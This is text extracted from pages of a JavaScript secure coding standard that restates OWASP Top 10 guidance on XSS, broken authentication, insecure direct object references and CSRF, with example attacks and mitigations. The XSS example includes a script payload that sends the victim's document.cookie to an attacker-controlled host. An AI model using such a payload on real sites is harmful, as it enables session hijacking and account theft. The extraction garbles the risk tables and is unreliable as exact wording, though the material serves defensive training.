WIXLIB

Cross-Site Scripting (XSS)XSS flaws occur whenever an application includes untrusted data in a new web page without propervalidation or escaping or updates an existing web page with user-supplied data using a browser APIthat can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browserwhich can hijack user sessions, deface web sites, or redirect the user to malicious sites.There are three forms of XSS, usually targeting users' browsers: Reflected XSS: The application or API includes unvalidated and unescaped user input as partof HTML output. A successful attack can allow the attacker to execute arbitrary HTML andJavaScript in the victim’s browser. Typically, the user will need to interact with somemalicious link that points to an attacker-controlled page, such as malicious watering holewebsites, advertisements, or similar.Stored XSS: The application or API stores non-sanitized user input that is viewed later byanother user or an administrator. Stored XSS is often considered a high or critical risk.DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamicallyinclude attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, theapplication would not send attacker-controllable data to unsafe JavaScript APIs.Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacementor defacement (such as trojan login panels), attacks against the user's browser such as malicioussoftware downloads, key logging, and other client-side icExploitabilityEASYAutomated tools can detectand exploit all three forms ofXSS, and there are freelyavailable exploitationframeworks.Security WeaknessPrevalenceWIDESPREADDetectabilityEASYXSS is the second mostprevalent issue in the OWASPTop 10 and is found in aroundtwo thirds of all applications.Automated tools can find someXSS problems automatically,particularly in maturetechnologies such as PHP, J2EE/ JSP, and /ImpactBusinessMODERATESpecificThe impact of XSS ismoderate for reflected andDOM XSS, and severe forstored XSS, with remotecode execution on thevictim's browser, such asstealing credentials,sessions, or deliveringmalware to the victim.Table 2: Cross-Site Scripting (XSS) Risk (OWASP Foundation, 2018)Page 11 of 67Title: JavaScript Secure Coding StandardVersion: 1.0Classification: PUBLIC

Example AttackThe application uses untrusted data in the construction of the following HTML snippet withoutvalidation or escaping:(String) page "〈inputname 'creditcard'type 'TEXT‘ value '" request.getParameter("CC") "'〉";The attacker modifies the ‘CC’ parameter in their browser to:'〉〈script〉document.location 'httx://www.attacker.com/cgibin/cookie.cgi?foo ' document.cookie〈/script〉'This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker tohijack the user’s current session.Note: Attackers can also use XSS to defeat any automated Cross-Site Request Forgery (CSRF) defensethe application might employ.MitigationPreventing XSS requires separation of untrusted data from active browser content. This can beachieved by: Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails,React JS. Learn the limitations of each framework's XSS protection and appropriately handlethe use cases which are not covered.Escaping untrusted HTTP request data based on the context in the HTML output (body,attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities.Applying context-sensitive encoding when modifying the browser document on the clientside acts against DOM XSS.Enabling a Content Security Policy (CSP) as a defense-in-depth mitigating control against XSS.It is effective if no other vulnerabilities exist that would allow placing malicious code via localfile includes (e.g. path traversal overwrites or vulnerable libraries from permitted contentdelivery networks).Consider consulting the following OWASP’s XSS Prevention Cheat Sheet and DOM based XSSPrevention Cheat Sheet for further guidance.Page 12 of 67Title: JavaScript Secure Coding StandardVersion: 1.0Classification: PUBLIC

Broken Authentication and Session ManagementApplication functions related to authentication and session management are often not implementedcorrectly, allowing attackers to compromise passwords, keys, session tokens, or exploit otherimplementation flaws to assume other users’ identities.Are session management assets like user credentials and session IDs properly protected? You maybe vulnerable if: User authentication credentials aren’t protected when stored using hashing or encryption; Credentials can be guessed or overwritten through weak account management functions(e.g., account creation, change password, recover password, weak session IDs); Session IDs are exposed in the URL (e.g., URL rewriting); Session IDs are vulnerable to session fixation attacks; Session IDs don’t timeout, or user sessions or authentication tokens, particularly single signon (SSO) tokens, aren’t properly invalidated during logout; Session IDs aren’t rotated after successful login; or, Passwords, session IDs, and other credentials are sent over unencrypted sideranonymousexternalattackers, aswell as userswith theirownaccounts,who mayattempt tostealaccountsfrom others.Also,considerinsiderswanting todisguise theiractions.The attackeruses leaks orflaws in theauthenticationor sessionmanagementfunctions(e.g., exposedaccounts,passwords,session IDs)toimpersonateusers.Developers frequently buildcustom authentication andsession management schemesbut building these correctly ishard. As a result, these customschemes frequently have flawsin areas such as logout,password management, andtimeouts, remember me, secretquestion, account update, etc.Finding such flaws cansometimes be difficult, as eachimplementation is unique.Security SEVERESuch flawsmay allowsome oreven allaccounts tobe attacked.Oncesuccessful,the attackercan doanything thevictim coulddo.Privilegedaccounts arefrequentlytargeted.BusinessImpactsApplication/ BusinessSpecificConsider thebusinessvalue of theaffected dataor applicationfunctions.Also,consider thebusinessimpact ofpublicexposure ofthevulnerability.Table 3: Broken Authentication and Session Management Risk (OWASP Foundation, 2017)Page 13 of 67Title: JavaScript Secure Coding StandardVersion: 1.0Classification: PUBLIC

Example AttackScenario #1: A reservations application supports URL rewriting, putting session IDs in the URL:httx://example.com/sale/saleitems;jsessionid 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest HawaiiAn authenticated user of the site wants to let his friends know about the sale. He e-mails the abovelink without knowing he is also giving away his session ID. When his friends use the link, they will usehis session and credit card.Scenario #2: Application’s timeouts aren’t set properly. User uses a public computer to access site.Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker usesthe same browser an hour later, and that browser is still authenticated.Scenario #3: Insider or external attacker gains access to the system’s password database. Userpasswords are not encrypted, exposing every users’ password to the attacker.MitigationsThe primary recommendation for an organization is to make available to developers: A single set of strong authentication and session management controls. Such controls shouldstrive to:o meet all the authentication and session management requirements defined inOWASP’s Application Security Verification Standard; and,o have a simple interface for developers.Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDsConsider consulting the following OWASP’s Authentication Cheat Sheet for further guidance.Page 14 of 67Title: JavaScript Secure Coding StandardVersion: 1.0Classification: PUBLIC

Insecure Direct Object ReferencesA direct object reference occurs when a developer exposes a reference to an internalimplementation object, such as a file, directory, or database key. Without an access control check orother protection, attackers can manipulate these references to access unauthorized data.The best way to find out if an application is vulnerable to insecure direct object references is toverify that all object references have appropriate defenses. To achieve this, consider: For direct references to restricted resources, the application needs to verify the user isauthorized to access the exact resource they have requested.If the reference is an indirect reference, the mapping to the direct reference must be limitedto values authorized for the current user.Code review of the application can quickly verify whether either approach is implemented safely.Testing is also effective for identifying direct object references and whether they are safe.Automated tools typically do not look for such flaws because they cannot recognize what requiresprotection or what is safe or cExploitabilityEASYConsider thetypes of usersof yoursystem. Doany usershave onlypartial accessto certaintypes ofsystem data?Security ImpactsImpactMODERATEBusinessImpactsApplication/ BusinessSpecificConsider thebusinessvalue of theexposeddata.The attacker,Applications frequently useSuch flaws canwho is anthe actual name or key of ancompromiseauthorizedobject when generating weball the datasystem user,pages. Applications don'tthat can besimplyalways verify the user isreferenced bychanges aauthorized for the targetthe parameter.parameterobject. This results in anUnless theAlso,value thatinsecure direct objectnamespace isconsider thedirectly refersreference flaw. Testers cansparse, it'sbusinessto a systemeasily manipulate parametereasy for animpact ofobject tovalues to detect such flawsattacker topublicanother object and code analysis quicklyaccess allexposure ofthe user isn'tshows whether authorizationavailable datatheauthorized for. is properly verified.of that type.vulnerability.Is accessgranted?Table 4: Insecure Direct Object References Risk (OWASP Foundation, 2010)Page 15 of 67Title: JavaScript Secure Coding StandardVersion: 1.0Classification: PUBLIC

Example AttackThe application uses unverified data in a SQL call that is accessing account information:String query "SELECT * FROM accts WHERE account ?";PreparedStatement pstmt connection.prepareStatement(query , . );pstmt.setString( 1, request.getParameter("acct"));ResultSet results pstmt.executeQuery();The attacker simply modifies the ‘acct’ parameter in their browser to send whatever accountnumber they want. If not verified, the attacker can access any user’s account, instead of only theintended customer’s account.httx://example.com/app/accountInfo?acct notmyacctMitigationPreventing insecure direct object references requires selecting an approach for protecting each useraccessible object (e.g., object number, filename): Use per user or session indirect object references. This prevents attackers from directlytargeting unauthorized resources. For example, instead of using the resource’s database key,a drop-down list of six resources authorized for the current user could use the numbers 1 to6 to indicate which value the user selected. The application must map the per-user indirectreference back to the actual database key on the server. Check access. Each use of a direct object reference from an untrusted source must includean access control check to ensure the user is authorized for the requested object.Page 16 of 67Title: JavaScript Secure Coding StandardVersion: 1.0Classification: PUBLIC

Cross-Site Request Forgery (CSRF)A Cross-Site Request Forgery (CSRF) attack forces a logged-on victim’s browser to send a forgedHTTP request, including the victim’s session cookie and any other automatically includedauthentication information, to a vulnerable web application. This allows the attacker to force thevictim’s browser to generate requests the vulnerable application thinks are legitimate requests fromthe victim.The easiest way to check whether an application is vulnerable is to see if each link and form containsan unpredictable token for each user. Without such an unpredictable token, attackers can forgemalicious requests. Focus on the links and forms that invoke state-changing functions, since thoseare the most important CSRF targets.You should check multi-step transactions, as they are not inherently immune. Attackers can easilyforge a series of requests by using multiple tags or possibly JavaScript.Note: Session cookies, source IP addresses, and other information that is automatically sent by thebrowser doesn’t count since this information is also included in forged ficExploitabilityAVERAGEConsideranyone whocan trick yourusers intosubmitting arequest toyour website.Any websiteor otherHTML feedthat youruser’s accesscould do this.The attackercreates forgedHTTP requestsand tricks avictim intosubmittingthem viaimage tags,XSS, ornumerousothertechniques. Ifthe user isauthenticated,the attacksucceeds.Security ityEASYImpactMODERATECSRF takes advantage of webapplications that allowattackers to predict all thedetails of an action.Since browsers sendcredentials like session cookiesautomatically, attackers cancreate malicious web pageswhich generate forgedrequests that areindistinguishable fromlegitimate ones.Detection of CSRF flaws iseasy via penetration testing orcode analysis.Attackers cancause victimsto changeany data thevictim canchange orperform anyfunction thevictim isauthorized onsider thebusinessvalue of theaffected dataor applicationfunctions.Imagine notbeing sure ifusersintended totake theseactions.Consider theimpact onyourreputation.Table 5 OWASP Top A5: Cross-Site Request Forgery (OWASP Foundation, 2017)Page 17 of 67Title: JavaScript Secure Codi

Title: JavaScript Secure Coding Standard Version: 1.0 Classification: PUBLIC Cross-Site Scripting (XSS) XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript.